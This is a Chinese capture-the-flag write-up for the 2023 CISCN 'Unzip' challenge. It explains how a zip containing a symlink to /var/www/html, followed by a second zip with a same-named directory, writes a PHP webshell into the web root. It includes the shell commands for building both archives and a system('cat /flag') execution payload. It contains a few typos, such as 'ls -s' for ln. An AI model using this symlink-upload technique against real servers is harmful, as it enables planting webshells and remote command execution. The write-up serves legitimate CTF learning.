2023ciscn初赛 Unzip

 参考：

奇安信攻防社区-2021深育杯线上初赛官方WriteUp-Web篇

1.打开环境

 2.上传一个文件，得到以下源码，分析一下8

当解压操作可以覆盖上一次解压文件就可以造成任意文件上传漏洞。此题上传的文件被保存到了/tmp目录下，而且没有require和include这种文件包含的点，因此无法直接执行上传文件里面的代码，因此这里考虑利用软连接，进行目录穿越，将文件上传到任意目录。

参考

一个有趣的任意文件读取 - 先知社区

软连接的作用类似于win下的快捷方式

软连接

软连接是linux中一个常用命令， 它的功能是为某一个文件在另外一个位置建立一个同步的链接。软连接类似与c语言中的指针，传递的是文件的地址； 更形象一些，软连接类似于WINDOWS系统中的快捷方式。 例如，在a文件夹下存在一个文件hello，如果在b文件夹下也需要访问hello文件，那么一个做法就是把hello复制到b文件夹下，另一个做法就是在b文件夹下建立hello的软连接。通过软连接，就不需要复制文件了，相当于文件只有一份，但在两个文件夹下都可以访问。

可以考虑软连接进行目录穿越的几个特征：

有文件上传接口，但是上传文件的目录不能确定可以上传zip文件并且会将文件解压到上传目录下
可以getshell的文件可以绕过waf成功上传此题符合几个特征，因此可以尝试此方法

3.先创建构造一个指向/var/www/html目录的软链接，因为html目录下是web环境，为了后续可以getshell

ls -s /var/www/html/ link

 4.打包到到1.zip，对link文件进行压缩。

zip --symlinks 1.zip link

 zip --symlinks，是在zip压缩文件中，包含符号链接本身，而不是它们指向的实际文件或目录，也就是说当解压缩这个zip文件，将得到符号链接，而不是它们指向的实际文件

5.构造第二个压缩包2.zip。创建一个link目录(因为上一个压缩包里边目录就是link)，

在link目录下写一个shell.php文件，文件中写入木马文件，这里先写入phpinfo()进行测试

rm link

mkdir linkcd link  (创建目录）

echo " shell.php

cd ../ 

zip -r 2.zip link 

6. 将1.zip 和2.zip 依次上传，压缩包会被解压 

当我们上传第二个压缩包时会覆盖上一个link目录，但是link目录软链接指向/var/www/html。

之前我们上传了一个软链接web到/tmp 目录下，此时若解压z.zip的话，正常情况下会解压到：/tmp/web/shell.php 但是由于web指向了 /var/www/html目录，所以会恰好将shell.php解压到 /var/www/html/shell.php 刚好解压到网站的访问目录，达到了getsehll的目的。

传马

ln -s /var/www/html test #ln -s 源文件 目标文件
 
zip -y test1.zip test #-y：直接保存符号连接，而非该链接所指向的文件，本参数仅在UNIX之类的系统下有效；
 
rm -rf test  #rm -rf 删除文件夹
 
mkdir test  #mkdir是make directory的缩写，Linux中 mkdir 命令用来创建指定的名称的目录，要求创建目录的用户在当前目录中具有写权限，并且指定的目录名不能是当前目录中已有的目录。
 
cd test
 
echo '' > a.php
 
cd ..
 
zip -q -r test2.zip test 
#使用zip来将文件夹test压缩为test2.zip
#-r代表 recursive，代表递归处理，将指定目录下的所有文件和子目录一并处理。
#-q代表 quiet，代表无声模式，不输出压缩时的具体细节。

此时可以使用蚁剑连接或者命令执行

a=system('cat /flag')